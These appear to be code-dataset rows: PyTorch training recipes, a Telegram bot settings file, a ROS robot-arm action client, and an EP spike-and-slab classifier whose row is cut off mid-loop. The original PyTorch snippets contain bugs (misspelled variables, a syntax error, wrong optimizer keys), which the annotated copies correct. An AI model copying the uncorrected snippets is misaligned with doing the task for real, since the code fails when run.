scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer=,T_max=80)
# Redule learning rate by 10 at given epochs
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,milestones=[50,70],gamma=0.1)
for t in range(0,80):
scheduler.step()
train(...)
val(...)
# learning rate warmup by 10 epochs
# torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda, last_epoch=-1, verbose=False)
# 设置学习率为初始学习率乘以给定lr_lambda函数的值,lr_lambda一般输入为当前epoch
# https://blog.csdn.net/ltochange/article/details/116524264
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer,lr_lambda=lambda t: t/10)
for t in range(0,10):
scheduler.step()
train(...)
val(...)
#**********************优化器链式更新******************************#
# 从pytorch1.4版本开始,torch.optim.lr_scheduler支持链式更新(chaining),即用户可以定义两个schedulers,并在训练过程中交替使用
import torch
from torch.optim import SGD
from torch.optim.lr_scheduler import ExponentialLR,StepLR
model = [torch.nn.Parameter(torch.randn(2,2,requires_grad=True))]
optimizer = SGD(model,0.1)
scheduler1 = ExponentialLR(optimizer,gamma=0.9)
scheduler2 = StepLR(optimizer,step_size=3,gamma=0.1)
for epoch in range(4):
print(ecoch,scheduler2.get_last_lr()[0])
print(epoch,scheduler1.get_last_lr()[0])
optimizer.step()
scheduler1.step()
scheduler2.step()
#********************模型训练可视化*******************************#
# pytorch可以使用tensorboard来可视化训练过程
# pip install tensorboard
# tensorboard --logdir=runs
# 使用SummaryWriter类来收集和可视化相应的数据,为了方便查看,可以使用不同的文件夹,比如'loss/train'和'loss/test'
from torch.utils.tensorboard import SummaryWriter
import numpy as np
writer = SummaryWriter()
for n_iter in range(100):
writer.add_scalar('loss/train',np.random.random(),n_iter)
writer.add_scalar('loss/test',np.random.random(),n_iter)
writer.add_scalar('Accuracy/train',np.random.random(),n_iter)
writer.add_scalar('Accuracy/test',np.random.random(),n_iter)
#********************保存和加载检查点****************************#
start_epoch = 0
# Load checkpoint.
if resume: # resume为参数,第一次训练时设为0,中断再训练时设为1
model_path = os.path.join('model', 'best_checkpoint.pth.tar')
assert os.path.isfile(model_path)
checkpoint = torch.load(model_path)
best_acc = checkpoint['best_acc']
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
print('Load checkpoint at epoch {}.'.format(start_epoch))
print('Best accuracy so far {}.'.format(best_acc))
# Train the model
for epoch in range(start_epoch, num_epochs):
...
# Test the model
...
# save checkpoint
is_best = current_acc > best_acc
best_acc = max(current_acc, best_acc)
checkpoint = {
'best_acc': best_acc,
'epoch': epoch + 1,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
}
model_path = os.path.join('model', 'checkpoint.pth.tar')
best_model_path = os.path.join('model', 'best_checkpoint.pth.tar')
torch.save(checkpoint, model_path)
if is_best:
shutil.copy(model_path, best_model_path)
| 34.553797 | 111 | 0.637513 | import torch
import torch.nn as nn
import numpy as np
#********************模型训练*******************************#
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(),lr=learning_rate)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = model.to(device)
for epoch in range(train_epochs):
for i,(images,labels) in enumerate(train_loader):
images = images.cuda()
labels = labels.cuda()
outs = model(images)
loss = criterion(outs,labels)
# 根据pytorch中backward()函数的计算,
# 当网络参量进行反馈时,梯度是累积计算而不是被替换,
# 但在处理每一个batch时并不需要与其他batch的梯度混合起来累积计算,
# 因此需要对每个batch调用一遍zero_grad()将参数梯度置0.
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch:{epoch},Loss:{loss.item()}...')
#********************模型测试************************#
model.eval() #对于bn和drop_out 起作用
with torch.no_grad():
correct = 0
total = 0
for images,labels in test_loader:
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
pred = torch.argmax(outputs,1).item()
correct+= (torch.argmax(outputs,1)==labels).sum().cpu().data.numpy()
total += len(images)
print(f'acc:{correct/total:.3f}')
#****************自定义loss*************************#
class MyLoss(nn.Module):
    """Custom mean-squared-error loss: mean((x - y) ** 2)."""
    def __init__(self):
        super(MyLoss,self).__init__()
    def forward(self,x,y):
        # BUG fix: the original assigned to the misspelled name `looss`
        # and then returned the undefined `loss`, raising NameError on
        # every forward pass.
        loss = torch.mean((x-y)**2)
        return loss
#***************标签平滑,有很强的聚类效果???****************************#
# https://zhuanlan.zhihu.com/p/302843504 label smoothing 分析
# 写一个label_smoothing.py 的文件,然后再训练代码里面引用,用LSR代替交叉熵损失即可
import torch
import torch.nn as nn
# timm 库中有现成的接口
# PyTorchImageModels
# from timm.loss import LabelSmoothingCrossEntrophy
# from timm.loss import SoftTargetCrossEntrophy
# criterion = LabelSmoothingCrossEntrophy(smoothing=config.MODEL.LABEL_SMOOTHING)
# criterion = SoftTargetCrossEntrophy()
class LSR(nn.Module):
    """Cross-entropy loss with label-smoothing regularization (LSR).

    The hard one-hot target is replaced by a soft distribution that puts
    (1 - e) on the true class and spreads e uniformly over the others.
    """
    def __init__(self,e=0.1,reduction='mean'):
        super(LSR,self).__init__()
        self.log_softmax = nn.LogSoftmax(dim=1)
        self.e = e  # smoothing factor
        self.reduction = reduction
    def _one_hot(self,labels,classes,value=1):
        '''
        Convert labels to one hot vectors
        Args:
            labels: torch tensor in format [label1,label2,label3,...]
            classes: int,number of classes
            value: label value in one hot vector,default to 1
        Returns:
            return one hot format labels in shape [batchsize,classes]
        '''
        one_hot = torch.zeros(labels.size(0),classes)
        # labels and value_added size must match for scatter_add_
        labels = labels.view(labels.size(0),-1)
        value_added = torch.Tensor(labels.size(0),1).fill_(value)
        value_added = value_added.to(labels.device)
        one_hot = one_hot.to(labels.device)
        # scatter_add_(dim, index, src): add the src values into one_hot
        # at the label positions along dim 1.
        one_hot.scatter_add_(1,labels,value_added)
        return one_hot
    def _smooth_label(self,target,length,smooth_factor):
        '''
        Convert targets to one hot vector and smooth them
        eg:
            [1,0,0,0,0,0]->[0.9,0.02,0.02,0.02,0.02,0.02]
        Args:
            target: target in format[label1,label2,label3,...,label_batchsize]
            length: length of one-hot format(number of classes)
            smooth_factor: smooth factor for label smooth
        Returns:
            smoothed labels in one hot format
        '''
        one_hot = self._one_hot(target,length,value=1-smooth_factor)
        one_hot += smooth_factor/(length-1)
        return one_hot.to(target.device)
    def forward(self,x,target):  # x: raw class scores, shape [B, num_classes]
        if x.size(0)!=target.size(0):
            raise ValueError(f'Expected input batchsize{x.size(0)} to match target batchsize {target.size(0)}')
        if x.dim()!=2:
            raise ValueError(f'Expected input tensor to have 2 dimensions,got {x.dim()}')
        smoothed_target = self._smooth_label(target,x.size(1),self.e)
        x = self.log_softmax(x)
        loss = torch.sum(-x*smoothed_target,dim=1)
        # BUG fix: the original only matched the string 'None' while its
        # own error message documents 'none'; accept both ('None' kept
        # for backward compatibility).
        if self.reduction in ('none', 'None'):
            return loss
        elif self.reduction == 'sum':
            return torch.sum(loss)
        elif self.reduction == 'mean':
            return torch.mean(loss)
        else:
            raise ValueError('Unrecognized option, expect reduction to be one of none, mean, sum')
# 或者直接再训练过程中进行标签平滑
# Manual label smoothing inside the training loop (alternative to an LSR loss).
for images, labels in train_loader:
    images, labels = images.cuda(), labels.cuda()
    N = labels.size(0)
    # C is the number of classes; off-class weight is 0.1/(C-1), true class 0.9.
    off_value = 0.1 / (C - 1)
    smoothed_labels = torch.full(size=(N, C), fill_value=off_value).cuda()
    smoothed_labels.scatter_(dim=1, index=labels.unsqueeze(dim=1), value=0.9)
    logits = model(images)
    log_prob = torch.nn.functional.log_softmax(logits, dim=1)
    # average of the per-sample soft cross-entropies
    loss = -(log_prob * smoothed_labels).sum() / N
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
#******************************Mixup训练,数据增强的一种方式***********************************#
# mixup采用对不同类别之间进行建模的方式实现数据增强,而通用数据增强方法则是针对同一类做变换。(经验风险最小->邻域风险最小),提升对抗样本及噪声样本的鲁棒性
# 思路非常简单:
# 从训练样本中随机抽取两个样本进行简单的随机加权求和,对于标签,相当于加权后的样本有两个label
# 求loss的时候,对两个label的loss进行加权,在反向求导更新参数。
# https://zhuanlan.zhihu.com/p/345224408
# distributions包含可参数化的概率分布和采样函数
# timm库有现成接口
# from timm.data import Mixup
# mixup_fn = Mixup(
# mixup_alpha=0.8,
# cutmix_alpha=1.0,
# cutmix_minmax=None,
# prob=1.0,
# switch_prob=0.5,
# mode='batch',
# label_smoothing=0.1,
# num_classes=1000)
# x,y = mixup_fn(x,y)
# Mixup training: blend random pairs of samples and combine their losses.
beta_distribution = torch.distributions.beta.Beta(alpha, alpha)
for images, labels in train_loader:
    images, labels = images.cuda(), labels.cuda()
    # Draw the mixing coefficient and a random pairing of the batch.
    lam = beta_distribution.sample([]).item()
    perm = torch.randperm(images.size(0)).cuda()
    mixed_images = lam * images + (1 - lam) * images[perm, :]
    targets_a, targets_b = labels, labels[perm]
    # Loss is the convex combination of the two targets' losses.
    outputs = model(mixed_images)
    loss = (lam * loss_function(outputs, targets_a)
            + (1 - lam) * loss_function(outputs, targets_b))
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
#************************ Regularization ***********************
# L1 regularization (add the sum of absolute weights to the loss)
# NOTE(review): this snippet looks broken as written — `loss` is bound to the
# CrossEntropyLoss *module*, not to a computed loss tensor, so `loss += tensor`
# raises TypeError and there is nothing meaningful to backprop. Presumably the
# intent is `criterion = nn.CrossEntropyLoss(); loss = criterion(outputs, labels)`
# before accumulating the L1 term — confirm against the original recipe.
loss = nn.CrossEntropyLoss()
for param in model.parameters():
    loss += torch.sum(torch.abs(param))
loss.backward()
# L2 regularization: PyTorch's `weight_decay` implements it. Biases are
# exempted by putting them in a parameter group with weight_decay=0.
bias_list = (param for name, param in model.named_parameters() if name[-4:] == 'bias')
others_list = (param for name, param in model.named_parameters() if name[-4:] != 'bias')
# BUG FIX: per-parameter option dicts must use the key 'params' — torch.optim
# raises for the original key 'parameters'.
parameters = [{'params': bias_list, 'weight_decay': 0},
              {'params': others_list}]
optimizer = torch.optim.SGD(parameters, lr=1e-2, momentum=0.9, weight_decay=1e-4)
#********************* Gradient clipping *************************#
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=20)
#******************** Reading the current learning rate *********************#
# Single global learning rate (the common case):
lr = optimizer.param_groups[0]['lr']
# Multiple learning rates for different layers:
all_lr = [param_group['lr'] for param_group in optimizer.param_groups]
# Inside a batch loop the live value is optimizer.param_groups[0]['lr'].
#********************** Learning-rate decay ************************#
# BUG FIX: class name typo — ReduceLROnPlateaue -> ReduceLROnPlateau.
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='max', patience=5, verbose=True)
for epoch in range(num_epochs):
    train_one_epoch(...)
    val(...)
    scheduler.step(val_acc)
# Cosine annealing learning rate
# BUG FIX: `CosineAnnealingLR(optimizer=,T_max=80)` was a syntax error
# (keyword argument with no value).
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=80)
# Reduce learning rate by 10 at given epochs
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[50, 70], gamma=0.1)
for t in range(0, 80):
    scheduler.step()
    train(...)
    val(...)
# learning rate warmup by 10 epochs
# torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda, last_epoch=-1, verbose=False)
# sets lr = base_lr * lr_lambda(epoch); here it ramps linearly over 10 epochs
# https://blog.csdn.net/ltochange/article/details/116524264
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda t: t / 10)
for t in range(0, 10):
    scheduler.step()
    train(...)
    val(...)
#********************** Chained scheduler updates ******************************#
# Since PyTorch 1.4, torch.optim.lr_scheduler supports chaining: two schedulers
# attached to the same optimizer can both be stepped each epoch and their
# multiplicative effects compose.
import torch
from torch.optim import SGD
from torch.optim.lr_scheduler import ExponentialLR, StepLR
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = SGD(model, 0.1)
scheduler1 = ExponentialLR(optimizer, gamma=0.9)
scheduler2 = StepLR(optimizer, step_size=3, gamma=0.1)
for epoch in range(4):
    # BUG FIX: the original printed the undefined name `ecoch` (NameError).
    print(epoch, scheduler2.get_last_lr()[0])
    print(epoch, scheduler1.get_last_lr()[0])
    optimizer.step()
    scheduler1.step()
    scheduler2.step()
#******************** Training visualisation *******************************#
# PyTorch can log to TensorBoard:
#   pip install tensorboard
#   tensorboard --logdir=runs
# SummaryWriter collects the scalars; distinct tags such as 'loss/train' and
# 'loss/test' keep the curves separated in the UI.
from torch.utils.tensorboard import SummaryWriter
import numpy as np
writer = SummaryWriter()
for n_iter in range(100):
    for tag in ('loss/train', 'loss/test', 'Accuracy/train', 'Accuracy/test'):
        writer.add_scalar(tag, np.random.random(), n_iter)
#******************** Saving and loading checkpoints ****************************#
start_epoch = 0
# Load checkpoint.
if resume: # `resume` flag: 0 on the first run, 1 when resuming after an interruption
    model_path = os.path.join('model', 'best_checkpoint.pth.tar')
    assert os.path.isfile(model_path)
    checkpoint = torch.load(model_path)
    best_acc = checkpoint['best_acc']
    start_epoch = checkpoint['epoch']
    model.load_state_dict(checkpoint['model'])
    optimizer.load_state_dict(checkpoint['optimizer'])
    print('Load checkpoint at epoch {}.'.format(start_epoch))
    print('Best accuracy so far {}.'.format(best_acc))
# Train the model
for epoch in range(start_epoch, num_epochs):
    ...
    # Test the model
    ...
    # save checkpoint
    # NOTE(review): when `resume` is falsy, `best_acc` (and `current_acc`) must
    # be initialised elsewhere before this point — TODO confirm.
    is_best = current_acc > best_acc
    best_acc = max(current_acc, best_acc)
    checkpoint = {
        'best_acc': best_acc,
        'epoch': epoch + 1,
        'model': model.state_dict(),
        'optimizer': optimizer.state_dict(),
    }
    # always write the rolling checkpoint; copy it aside when it is the best so far
    model_path = os.path.join('model', 'checkpoint.pth.tar')
    best_model_path = os.path.join('model', 'best_checkpoint.pth.tar')
    torch.save(checkpoint, model_path)
    if is_best:
        shutil.copy(model_path, best_model_path)
| 1,040 | 1,682 | 96 |
a2feaa66fb720cdce480b8608dce5a48d06ecb63 | 343 | py | Python | settings.py | AbduazizZiyodov/google-it | 04ead41ebf99991a53816d3a3436bc18200534d9 | [
"MIT"
] | 5 | 2021-07-20T05:53:19.000Z | 2022-01-08T16:39:36.000Z | settings.py | AbduazizZiyodov/google-it | 04ead41ebf99991a53816d3a3436bc18200534d9 | [
"MIT"
] | null | null | null | settings.py | AbduazizZiyodov/google-it | 04ead41ebf99991a53816d3a3436bc18200534d9 | [
"MIT"
] | null | null | null | from os import getenv
from dotenv import load_dotenv
load_dotenv()
BOT_TOKEN = getenv("TELEGRAM_API_TOKEN")
GROUP_CHAT_ID = getenv("GROUP_CHAT_ID")
CHANNEL_NAME = getenv("CHANNEL_NAME")
SUPER_USER_ID = getenv("SUPER_USER_ID") # sudo :)
GOOGLE_API_KEY = getenv('GOOGLE_API_KEY')
CSE_ID = getenv('CSE_ID')
SENTRY_DSN = getenv("SENTRY_SDK") | 22.866667 | 50 | 0.772595 | from os import getenv
from dotenv import load_dotenv
load_dotenv()
BOT_TOKEN = getenv("TELEGRAM_API_TOKEN")
GROUP_CHAT_ID = getenv("GROUP_CHAT_ID")
CHANNEL_NAME = getenv("CHANNEL_NAME")
SUPER_USER_ID = getenv("SUPER_USER_ID") # sudo :)
GOOGLE_API_KEY = getenv('GOOGLE_API_KEY')
CSE_ID = getenv('CSE_ID')
SENTRY_DSN = getenv("SENTRY_SDK") | 0 | 0 | 0 |
43c16e1db9a20e1ecc8fe01ebda719c66c84cf46 | 1,514 | py | Python | scripts/move_client.py | stefanyangwang/mycobot_320_moveit | 95912336e921c48b8da37c1a6bd7db30fec0f1db | [
"BSD-2-Clause"
] | null | null | null | scripts/move_client.py | stefanyangwang/mycobot_320_moveit | 95912336e921c48b8da37c1a6bd7db30fec0f1db | [
"BSD-2-Clause"
] | null | null | null | scripts/move_client.py | stefanyangwang/mycobot_320_moveit | 95912336e921c48b8da37c1a6bd7db30fec0f1db | [
"BSD-2-Clause"
] | 1 | 2022-02-12T20:17:28.000Z | 2022-02-12T20:17:28.000Z | #!/usr/bin/env python
import rospy
import actionlib
from mycobot_320_moveit.msg import *
if __name__ == '__main__':
rospy.init_node('move_client')
result = move_client()
print(result) | 33.644444 | 66 | 0.693527 | #!/usr/bin/env python
import rospy
import actionlib
from mycobot_320_moveit.msg import *
def move_client():
    """Send a two-waypoint MultiMove goal to the 'move' action server.

    Returns 'target_reached' on success (actionlib state 3) or
    'target_not_reached' if the server aborts (state 4).
    """
    client = actionlib.SimpleActionClient('move', MultiMoveAction)
    print("Waiting for the move server ...")
    client.wait_for_server()
    print("\n --- Server ready --- \n")
    goal = MultiMoveGoal()
    # Both waypoints share the same end-effector orientation.
    quat = (0.3852122476586819, 0.5951954753491578,
            -0.3842176257717917, 0.5913803229935233)
    waypoints = (
        # approach pose, slightly above the target
        (0.25409088624289733, -0.03248359876201828, 0.11967745058037846),
        # target pose
        (0.2539028024599151, -0.0322778144393383, 0.06967822781338817),
    )
    for px, py, pz in waypoints:
        wp = robot_goals()
        wp.x, wp.y, wp.z = px, py, pz
        wp.ox, wp.oy, wp.oz, wp.ow = quat
        goal.targetPosition.append(wp)
    client.send_goal(goal)
    # Poll until SUCCEEDED (3); bail out early on ABORTED (4).
    client_state = client.get_state()
    while client_state != 3:
        client_state = client.get_state()
        if client_state == 4:
            return 'target_not_reached'
    print(client_state)
    print('--- Movement completed ---')
    return 'target_reached'
if __name__ == '__main__':
    # Initialise the ROS node, run the blocking action client, and report the
    # outcome string ('target_reached' / 'target_not_reached').
    rospy.init_node('move_client')
    result = move_client()
    print(result)
fc74b9577e20bcc629403331623bb4ddb894d484 | 40,036 | py | Python | OLSS/rcv1/ParamChoice/sep_tune.py | zsdlightning/OLSS | 7fc5d8621adfcaab61defb61719b82aeb05cc1b3 | [
"MIT"
] | 1 | 2018-06-29T10:02:29.000Z | 2018-06-29T10:02:29.000Z | OLSS/rcv1/ParamChoice/sep_tune.py | zsdlightning/OLSS | 7fc5d8621adfcaab61defb61719b82aeb05cc1b3 | [
"MIT"
] | null | null | null | OLSS/rcv1/ParamChoice/sep_tune.py | zsdlightning/OLSS | 7fc5d8621adfcaab61defb61719b82aeb05cc1b3 | [
"MIT"
] | null | null | null | #!/bin/python
import os
import sys
import time
import numpy as np
import scipy as sp
from scipy.stats import norm as normal
from scipy.special import *
from scipy.linalg import block_diag
from scipy.sparse import csr_matrix
import scipy.linalg as linalg
from sklearn import metrics
import random
'''
This version deals with sparse features, VW format
'''
feature_off = 3
#d: dimension, rho: selection prior
# normal_PDF / normal_CDF
#batch training
#note, n is an array
#calculate the appearche of each features in the training data, used for the step-size of each approx. factor
#this version is the same as train_stochastic_multi_rate, except that at the beining, I will update all the prior factors
#this version keeps average likelihood for pos. and neg. samples separately, and also use n_pos and n_neg to update the full posterior
#enforce the same step-size
#this reads data from HDFS and keeps read the negative samples until it reaches the same amount with the postive samples
#then pass once
#in theory, go 1000 pass can process all 7 days' data, 150 iteraions can process 1day's data
#SEP training
#calculate the appearche of each features in the training data, for postive and negative samples
if __name__ == '__main__':
	# CLI entry point: expects exactly one argument, the slab prior variance tau0.
	if len(sys.argv) != 2:
		print 'usage %s <tau0>'%sys.argv[0]
		sys.exit(1)
	# fixed seed for reproducible runs
	np.random.seed(0)
	# NOTE(review): tune_rcv1 is not defined in this chunk — presumably defined
	# elsewhere in the file; confirm before running.
	tune_rcv1(float(sys.argv[1]))
| 46.499419 | 183 | 0.496054 | #!/bin/python
import os
import sys
import time
import numpy as np
import scipy as sp
from scipy.stats import norm as normal
from scipy.special import *
from scipy.linalg import block_diag
from scipy.sparse import csr_matrix
import scipy.linalg as linalg
from sklearn import metrics
import random
'''
This version deals with sparse features, VW format
'''
feature_off = 3
def vec(a):
	"""Return `a` flattened into a column vector of shape (a.size, 1)."""
	return a.reshape((-1, 1))
def normalize(val, mean_std):
	"""Standardise `val` given `mean_std`, an indexable (mean, std) pair."""
	center = mean_std[0]
	scale = mean_std[1]
	return (val - center) / scale
class EPSS:
#d: dimension, rho: selection prior
def __init__(self, d, rho0 = 0.5, n_epoch = 1, mini_batch = 1, tol = 1e-5, damping = 0.9, tau0 = 1.0):
#Bernoli prior for selection variables
self.rho = logit(rho0)
self.tol = tol
self.damping = damping
self.tau0 = tau0
self.INF = 1e6
self.mini_batch = mini_batch
self.n_epoch = n_epoch
# normal_PDF / normal_CDF
def pdf_over_cdf(self, input):
#return normal.pdf(input)/normal.cdf(input)
return np.exp( normal.logpdf(input) - normal.logcdf(input) )
#batch training
	#batch training
	def train(self, X, y, intercept = False):
		"""Full-batch EP training of the spike-and-slab probit model.

		X: (n, d) design matrix; y: length-n labels in {-1, +1};
		intercept: if True, append a constant-1 column to X.
		Iterates likelihood-factor and prior-factor moment matching until the
		change in the global posterior (v, mu, r) drops below self.tol.
		NOTE(review): relies on self.init(...) and self.max_iter, which are not
		defined in this chunk — presumably provided elsewhere; confirm.
		"""
		if intercept:
			X = np.hstack([X, np.ones(X.shape[0]).reshape([X.shape[0],1])])
		self.init(X,y)
		n,d = X.shape
		X2 = X*X
		Y = np.tile(vec(y), [1,d])
		for it in xrange(self.max_iter):
			# snapshot of the global posterior for the convergence test
			old_v = self.v.copy()
			old_mu = self.mu.copy()
			old_r = self.r.copy()
			#likelihood terms (future version should have go through one by one rather than parallel)
			v = np.tile(self.v, [n,1])
			mu = np.tile(self.mu, [n, 1])
			# cavity distribution: remove each likelihood factor from the posterior
			v_inv_not = 1.0/v - 1.0/self.v_l
			v_not = 1.0/v_inv_not
			mu_not = v_not * (mu/v - self.mu_l/self.v_l)
			# probit moment matching (derivatives of log Z w.r.t. the cavity mean)
			t1 = y * np.sum(mu_not * X, 1)
			t2 = np.sqrt(np.sum(v_not*X2 + 1.0, 1))
			t3 = self.pdf_over_cdf(t1/t2)/t2
			dmu_not = np.tile(vec(t3*y), [1, d]) * X
			dv_not = np.tile(vec(-0.5*t3*t1/(t2*t2)), [1,d]) * X2
			mu = mu_not + v_not * dmu_not
			v = v_not - v_not**2*(dmu_not**2 - 2*dv_not)
			#updated likelihood terms
			v_l_inv = 1/v - 1/v_not
			# clamp non-positive precisions to a tiny positive value for stability
			v_l_inv[ v_l_inv <= 0] = 1/self.INF
			v_l = 1.0/v_l_inv
			#damping
			v_l_inv = self.damping * 1.0/v_l + (1 - self.damping) * 1.0/self.v_l
			v_l_inv_mu = self.damping * ( mu/v - mu_not/v_not ) + (1 - self.damping) * self.mu_l/self.v_l
			self.v_l = 1/v_l_inv
			self.mu_l = self.v_l * v_l_inv_mu
			#update global terms
			v_inv_all = np.sum(1/self.v_l, 0) + 1/self.v_p
			v_inv_mu = np.sum(self.mu_l/self.v_l, 0) + self.mu_p/self.v_p
			self.v = 1/v_inv_all
			self.mu = self.v * v_inv_mu
			#update prior terms
			v_inv_not = 1/self.v - 1/self.v_p
			v_not = 1/v_inv_not
			mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
			# tilted distribution under the slab prior N(0, tau0)
			v_tilt = 1/(1/v_not + 1/self.tau0)
			mu_tilt = v_tilt * (mu_not/v_not)
			#log N(0 | mu_not, v_not + tau0)
			log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
			#log N(0 | mu_not, v_not)
			log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
			rho_p = log_h - log_g
			sel_prob = expit(self.rho + rho_p)
			# mixture moments of the spike-and-slab tilted distribution
			mu = sel_prob * mu_tilt
			v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
			#damping
			self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
			v_p_inv = 1/v - v_inv_not
			v_p_inv[ v_p_inv <= 0] = 1/self.INF
			v_p_inv_mu = mu/v - mu_not/v_not
			v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
			v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
			self.v_p = 1/v_p_inv
			self.mu_p = self.v_p * v_p_inv_mu
			#update global approx. dist.
			self.r = self.rho_p + self.rho
			v_inv_all = np.sum(1/self.v_l, 0) + 1/self.v_p
			v_inv_mu = np.sum(self.mu_l/self.v_l, 0) + self.mu_p/self.v_p
			self.v = 1/v_inv_all
			self.mu = self.v * v_inv_mu
			#difference only on global approxiations
			diff = np.sqrt(np.sum((1/old_v - v_inv_all)**2) + np.sum((old_mu - self.mu)**2) + np.sum((old_r - self.r)**2))/(old_v.size + old_mu.size + old_r.size)
			print 'iter %d, diff = %g'%(it, diff)
			if diff < self.tol:
				break
#note, n is an array
def init_sep(self, n, d, damping_strategy = None , non_informative = True):
if non_informative:
#prior factors
self.rho_p = np.zeros(d)
self.mu_p = np.zeros(d)
self.v_p = self.INF*np.ones(d)
#average likelihood factors -- only for w
self.mu_l = np.zeros(d)
self.v_l = self.INF * np.ones(d)
#global posterior parameters
self.r = self.rho_p + self.rho
self.mu = np.zeros(d)
self.v = 1/(1.0/self.v_p + 1.0/self.v_l * n)
#calculate the appearche of each features in the training data, used for the step-size of each approx. factor
	def calc_feature_appearence(self, d, fea2id, training_file):
		"""Count how many training lines each feature appears in.

		d: number of features; fea2id: feature-name -> column-index map;
		training_file: VW-format file, one sample per line.
		Returns a length d+1 array; index d counts the intercept (every line).
		Side effect: saves the counts to 'feature_appearence.npy'.
		NOTE(review): this skips items[:3]; elsewhere the file uses the module
		constant feature_off = 3 for the same offset — presumably the same
		convention.
		"""
		#including intercept
		res = np.zeros(d+1)
		with open(training_file, 'r') as f:
			ct = 0
			for line in f:
				ct = ct + 1
				items = line.strip().split(' ')
				# the intercept appears in every sample
				res[ d ] = res[ d ] + 1
				for item in items[3:]:
					name = item.split(':')[0]
					id = fea2id[name]
					res[ id ] = res[ id ] + 1
				# progress indicator
				if ct%10000 == 0:
					print ct
		np.save('feature_appearence.npy',res)
		return res
#this version is the same as train_stochastic_multi_rate, except that at the beining, I will update all the prior factors
	def train_stochastic_multi_rate(self, d, n_pos, n_neg, training_file, fea2id, fea2stats, Xtest, ytest, logger, n_batch_update_prior = 1, intercept = False, damping_both = True):
		"""Streaming SEP training over a VW-format file, with separate average
		likelihood factors for positive and negative samples and per-feature
		("multi-rate") step sizes n_pos / n_neg.

		d: raw feature count (an intercept column is appended, so dim = d+1)
		n_pos, n_neg: per-feature appearance counts in pos./neg. samples
		training_file / fea2id / fea2stats: data file and feature maps
		Xtest, ytest, logger: held-out data and log sink for periodic AUC
		n_batch_update_prior: how many mini-batches between prior updates
		damping_both: also damp the per-sample likelihood updates
		All prior factors are refreshed once before streaming starts.
		NOTE(review): uses time.clock() and Python-2 print statements — this
		file is Python 2 code.
		"""
		#initialization
		#separate average likelihood for pos. & neg. samples
		d = d + 1
		self.INF = 1e6
		self.rho_p = np.zeros(d)
		self.mu_p = np.zeros(d)
		self.v_p = self.INF*np.ones(d)
		self.mu_l_pos = np.zeros(d)
		self.v_l_pos = self.INF * np.ones(d)
		self.mu_l_neg = np.zeros(d)
		self.v_l_neg = self.INF * np.ones(d)
		#global posterior parameters
		self.r = self.rho_p + self.rho
		self.mu = np.zeros(d)
		self.v = 1.0/(1.0/self.v_p + n_pos*1.0/self.v_l_pos + n_neg*1.0/self.v_l_neg)
		old_v = self.v.copy()
		old_mu = self.mu.copy()
		old_r = self.r.copy()
		it = 0
		curr = 0
		count = 0
		# per-mini-batch accumulators of natural parameters, by sample sign
		n_batch_pos = np.zeros(d)
		n_batch_neg = np.zeros(d)
		v_l_inv_batch_pos = np.zeros(d)
		v_l_inv_batch_neg = np.zeros(d)
		v_l_inv_mu_batch_pos = np.zeros(d)
		v_l_inv_mu_batch_neg = np.zeros(d)
		#first, update prior factors
		v_inv_not = 1/self.v - 1/self.v_p
		v_not = 1/v_inv_not
		mu_not = v_not * (self.mu/self.v - self.mu_p/self.v_p)
		v_tilt = 1/(1/v_not + 1/self.tau0)
		mu_tilt = v_tilt * (mu_not/v_not)
		#log N(0 | mu_not, v_not + tau0)
		log_h = normal.logpdf(mu_not, scale = np.sqrt(v_not + self.tau0))
		#log N(0 | mu_not, v_not)
		log_g = normal.logpdf(mu_not, scale = np.sqrt(v_not))
		rho_p = log_h - log_g
		sel_prob = expit(self.rho + rho_p)
		mu = sel_prob * mu_tilt
		v = sel_prob * (v_tilt + (1.0 - sel_prob)*mu_tilt**2)
		#damping
		self.rho_p = self.damping * rho_p + (1 - self.damping) * self.rho_p
		v_p_inv = 1/v - v_inv_not
		v_p_inv[ v_p_inv <= 0] = 1/self.INF
		v_p_inv_mu = mu/v - mu_not/v_not
		v_p_inv = self.damping * v_p_inv + (1 - self.damping) * 1/self.v_p
		v_p_inv_mu = self.damping * v_p_inv_mu + (1 - self.damping) * self.mu_p/self.v_p
		self.v_p = 1/v_p_inv
		self.mu_p = self.v_p * v_p_inv_mu
		#update global approx. dist.
		self.r = self.rho_p + self.rho
		v_inv_all = v_inv_not + 1.0/self.v_p
		v_inv_mu = mu_not/v_not + self.mu_p/self.v_p
		self.v = 1.0/v_inv_all
		self.mu = self.v * v_inv_mu
		#for updating prior factors
		accumulate_ind = []
		start_time = time.clock()
		while it < self.n_epoch:
			with open(training_file, 'r') as f:
				for line in f:
					count = count + 1
					#extract feature values
					items = line.strip().split(' ')
					id = []
					val = []
					for item in items[feature_off:]:
						key_val = item.split(':')
						id.append(fea2id[key_val[0]])
						if len(key_val) == 1:
							# bare feature name means value 1
							val.append(1.0)
						else:
							val.append( float(key_val[1]) )
							#val.append( normalize(float(key_val[1]), fea2stats[ key_val[0] ]) )
					#intercept
					id.append(d-1)
					val.append(1.0)
					#moment matching
